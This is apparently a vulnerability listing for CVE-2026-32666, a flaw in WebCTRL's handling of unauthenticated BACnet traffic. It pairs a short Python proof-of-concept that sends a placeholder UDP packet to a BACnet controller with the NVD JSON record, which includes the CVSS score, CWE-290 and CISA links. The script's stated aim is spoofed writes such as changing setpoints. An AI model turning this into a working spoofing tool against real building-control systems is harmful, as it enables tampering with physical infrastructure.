CVE-2026-32666

import socket # Target configuration TARGET_IP = "192.168.1.100" BACNET_PORT = 47808 def send_spoofed_bacnet(): """ Proof of Concept for CVE-2026-32666 This script demonstrates sending a raw UDP packet to a BACnet device. In a real scenario, the payload would contain a valid BACnet APDU to perform unauthorized actions (e.g., changing a setpoint). """ try: # Create a UDP socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Construct a malicious BACnet payload (Example: Who-Is request or Write Property) # Note: Actual exploitation requires constructing a valid BACnet APDU. # This is a placeholder to demonstrate the network capability. payload = b"\x01\x00\x00\x00\x10\x00\x00" print(f"[*] Sending spoofed packet to {TARGET_IP}:{BACNET_PORT}") sock.sendto(payload, (TARGET_IP, BACNET_PORT)) print("[+] Packet sent successfully.") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": send_spoofed_bacnet()

{"cve": {"id": "CVE-2026-32666", "sourceIdentifier": "[email protected]", "published": "2026-03-21T00:16:26.220", "lastModified": "2026-03-23T16:16:47.220", "vulnStatus": "Awaiting Analysis", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "WebCTRL systems that communicate over BACnet inherit the protocol's lack\n of network layer authentication. WebCTRL does not implement additional \nvalidation of BACnet traffic so an attacker with network access could \nspoof BACnet packets directed at either the WebCTRL server or associated\n AutomatedLogic controllers. Spoofed packets may be processed as \nlegitimate."}, {"lang": "es", "value": "Los sistemas WebCTRL que se comunican a través de BACnet heredan la falta de autenticación de capa de red del protocolo. WebCTRL no implementa validación adicional del tráfico BACnet, por lo que un atacante con acceso a la red podría falsificar paquetes BACnet dirigidos tanto al servidor WebCTRL como a los controladores AutomatedLogic asociados. Los paquetes falsificados pueden ser procesados como legítimos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-290"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-078-08.json", "source": "[email protected]"}, {"url": "https://www.automatedlogic.com/en/company/security-commitment/", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-078-08", "source": "[email protected]"}]}}